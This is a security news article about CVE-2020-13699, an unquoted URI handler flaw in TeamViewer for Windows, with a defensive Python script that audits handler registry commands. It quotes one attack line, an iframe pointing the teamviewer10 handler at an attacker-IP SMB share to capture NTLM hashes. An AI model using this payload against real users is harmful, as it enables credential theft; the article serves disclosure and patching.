TeamViewer recently patched a high-risk vulnerability in its desktop app for Windows by releasing a new version of its software. If exploited, the flaw could let remote attackers steal your system password and potentially exploit it.
What's more worrying is that this attack does not require the victim's interaction and can be performed almost automatically.
For those unaware, TeamViewer is a popular software application developed by the German company TeamViewer GmbH, for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.
It is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. It is also possible to access a system running TeamViewer with a web browser.
The severe vulnerability, tracked as CVE-2020-13699, was first discovered by Jeffrey Hofmann, a security researcher from Praetorian. According to the researcher, the vulnerability resides in the way TeamViewer for Windows quotes its custom URI handlers (an unquoted URI handler).
The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attacker's system. In other words, an attacker can use TeamViewer's URI scheme from a web page to trick the application installed on the victim's system into initiating a connection to an attacker-owned remote SMB share.
This triggers the SMB authentication process, which in turn leaks the system's username and the NTLMv2 hashed version of the password to the attackers.
In order to successfully exploit CVE-2020-13699, the attacker needs to embed a malicious iframe on a website and then trick victims into visiting that maliciously crafted URL. Once the victims click the link, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.
"An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share," explained Jeffrey Hofmann in an advisory.
"Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking)."
This vulnerability affects "URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1," Hofmann said.
Following disclosure of the vulnerability, TeamViewer patched the flaw by quoting the parameters passed by the affected URI handlers, e.g., URL:teamviewer10 Protocol "C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1".
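The fix described above can be checked on an endpoint by looking at whether each handler's open command wraps %1 in double quotes. The following is an added example, not code from TeamViewer or from the advisory; the function names and the unquoted sample command are assumptions constructed for illustration, and the registry path used is the standard HKEY_CLASSES_ROOT\<scheme>\shell\open\command location for URI handlers.

```python
# Handler names the advisory lists as affected.
AFFECTED_SCHEMES = (
    "teamviewer10 teamviewer8 teamviewerapi tvchat1 tvcontrol1 tvfiletransfer1 "
    "tvjoinv8 tvpresent1 tvsendfile1 tvsqcustomer1 tvsqsupport1 tvvideocall1 tvvpn1"
).split()

def classify(command):
    """Return 'quoted', 'unquoted' or 'no-placeholder' for an open-command string."""
    in_quotes, seen, i = False, False, 0
    while i < len(command):
        if command[i] == '"':
            in_quotes = not in_quotes
        elif command.startswith("%1", i):
            if not in_quotes:
                return "unquoted"  # URL text can split into extra arguments
            seen = True
            i += 1  # skip the '1' of the placeholder
        i += 1
    return "quoted" if seen else "no-placeholder"

def audit(commands):
    """Map each scheme to its verdict, given a dict of scheme -> command string."""
    return {scheme: classify(cmd) for scheme, cmd in commands.items()}

def read_registered_commands(schemes=AFFECTED_SCHEMES):
    """Windows only: read the default value of <scheme>\\shell\\open\\command."""
    import winreg  # standard library, available on Windows only
    found = {}
    for scheme in schemes:
        try:
            path = scheme + r"\shell\open\command"
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, path) as key:
                found[scheme] = winreg.QueryValueEx(key, "")[0]
        except OSError:
            continue  # handler not registered on this machine
    return found

# Constructed sample values, not read from a real system.
SAMPLE = {
    # Patched form as quoted in the article.
    "teamviewer10": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1"',
    # Assumed pre-patch form: same command with the placeholder left unquoted.
    "tvchat1": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" %1',
}

if __name__ == "__main__":
    import sys
    commands = read_registered_commands() if sys.platform == "win32" else SAMPLE
    for scheme, verdict in audit(commands).items():
        print(f"{scheme}: {verdict}")
```

Any handler reported as unquoted on a managed machine indicates a TeamViewer installation that still needs the update.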
"We implemented some improvements in URI handling relating to CVE 2020-13699," said TeamViewer in a statement. "Thank you, Jeffrey Hofmann with Praetorian, for your professionalism, and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release."
To address the issue, TeamViewer has released version 15.8.3 and recommends that users upgrade to it immediately.